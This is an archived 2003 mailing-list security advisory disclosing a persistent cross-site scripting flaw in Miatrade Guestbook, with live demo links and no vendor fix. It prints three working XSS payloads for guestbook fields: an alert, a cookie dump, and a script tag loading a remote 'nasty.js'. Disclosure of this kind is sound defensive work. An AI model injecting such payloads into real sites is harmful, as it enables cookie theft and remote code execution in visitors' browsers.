lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Miatrade Guestbook - Persistant XSS

------------------------------------------------------------------
          - EXPL-A-2003-021 exploitlabs.com Advisory 021
------------------------------------------------------------------
                          -= Miatrade Guestbook =-



Aug 20, 2003
Donnie Werner
morning_wood@...loitlabs.com


Product:
--------
Miatrade guestbook
http://www.miatrade.com

http://www.google.com/keyword/Miatrade+Guestbook


Vunerability:
----------------
1. persistant XSS


Description of product:
-----------------------
"Miatrade Guestbook gives you the ability to gather information
 from your visitors. They can post a public message that
 may include: Name, E-mail, url, Home page and Comments
 about your site.
Miatrade guestbook let's you keep in touch with who's visiting
 your site and are a great way to make your site more
 interactive and keep visitors coming back."


VUNERABILITY / EXPLOIT
======================

Miatrade guestbook does not filter HTML code from user-supplied
 input. A remote user can create a specially crafted URL that,
 when loaded by a target user, will cause arbitrary scripting
 code to be executed by the target user's browser. The code will
 originate from the site running the Miatrade guestbook software
 and will run in the security context of that site.


persistant XSS rendered in fields:

[name] - <script>alert("You are vunerable to xss")</script>

[homepage] - <script>document.write(document.cookie)</script>

[message] - <script language="JavaScript"
src="http://someremote-url/nasty.js" type="text/javascript"></script>

live examples:

demo - sign

http://www.miatrade.com/cgi-bin/guest/sign.pl?fibi

demo - view

http://www.miatrade.com/cgi-bin/guest/view.pl?fibi



Local:
------
no

Remote:
-------
yes


Vendor Fix:
-----------
No fix on 0day


Vendor Contact:
---------------
Concurrent with this advisory
info@...trade.com


Credits:
--------
Donnie Werner
co-founder / CTO
e2-labs.com
morning_wood@...labs.com

http://exploitlabs.com
http;//nothackers.org/about.php



Original advisory at
http://exploitlabs.com/files/advisories/EXPL-A-2003-021-miatrade-gb.txt

Powered by blists - more mailing lists